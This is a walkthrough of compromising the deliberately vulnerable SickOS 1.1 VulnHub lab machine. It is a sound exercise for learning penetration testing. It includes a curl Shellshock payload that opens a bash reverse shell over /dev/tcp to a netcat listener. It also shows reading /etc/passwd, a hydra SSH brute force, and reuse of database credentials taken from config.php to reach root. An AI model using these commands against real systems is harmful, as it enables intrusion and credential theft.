Sickos 1.1 Walkthrough

This is a walkthrough of SickOS 1.1 found on VulnHub. The objective is to compromise the VM, gain root privileges, and find the flag. We need to treat this machine as a remote server, so we can’t use any kernel tricks here.

After booting the virtual machine, I needed to find the IP address of the box, so I did a simple ping sweep.

nmap -n -sP

SickOS 1.1 Ping Sweep

The IP address of the SickOS 1.1 server is I knew this because the Kali VM IP address is Now that I have the IP of the SickOS server I need to identify any open ports. Running a nmap scan of the host will give me the information I need to get started:

nmap -n -Pn -sS -p -

SickOS 1.1 Nmap Scan

The results show that we have what looks like Squid Proxy Server open on port 3128 and SSH on port 22. Next I want to run a Nikto scan to look for any low hanging fruit. Be sure to use the “-useproxy” flag so the scan runs through the proxy.

nikto -h -useproxy

SickOS 1.1 Nikto Scan

Some interesting results return from the Nikto scan. Here we can see that the “/cgi-bin/status” portion of the site is vulnerable to ShellShock. We will use this an attack vector to exploit the server and gain access to the box. Open a second terminal window and establish a netcat listener.

nc -lvnp 666

Now we exploit ShellShock using curl.

curl -H "User-Agent: () { ;: }; /bin/bash -i >& /dev/tcp/ 0&>1" -x

SickOS 1.1 ShellShock Exploit

After running the curl command, switch over to the terminal window that is running our Netcat listener. You should have been given a shell prompt.

SickOS 1.1 Reverse Shell Prompt

Now that we have access on the box we need to gather some information. First I am going to check out the “/etc/passwd” file.

cat /etc/passwd

SickOS 1.1 /etc/passwd

In the results we see that an account exists with the username “sickos”, a directory in “home”, and that the user has shell access on the box. Now I want to check out the “/etc/group” file for more information.

cat /etc/group

SickOS 1.1 /etc/group

The results show that the user “sickos” is part of the “adm” group. This is indicative of the user being able to use the sudo command to access root. Armed with this info I am going to attempt bruteforce SSH to see if I can get the password. I figure I will let hydra run while I poke around the box looking for any further useful information.

hydra -t 10 -l sickos -P /usr/share/wordlist/rockyou.txt -vV ssh

I tried to get this started several times with no avail - looks like there might be something blocking it, so I am going to continue gathering information on the box. Because this server is acting as a webserver - typically web files are hosted in “/var/www,” so I am going to change to the directory and list out all files.

cd /var/www/

SickOS 1.1 ls /var/www

Here we see a directory called “wolfcms” - this contains the website and configuration files. Within the “wolfcms” dir there is a file called “config.php.” These config files typically have database usernames, passwords, and configuration settings for the website, so I am going to take a look.

cat config.php|head -20

SickOS 1.1 config.php Contents

In the “config.php” is a database username and password. One thing about users’ is they tend to use the same password everywhere, so let’s try using it with SSH and the “sickos” user.

ssh sickos@

The SSH username and pasword worked! Since we know “sickos” is in sudoes lets switch to “root” and see what is in the “/root” directory.

sudo su -
# enter sickos password

Inside the “/root” directory is the flag, cat the file out and we have completed the objective!

SickOS 1.1 Cat Flag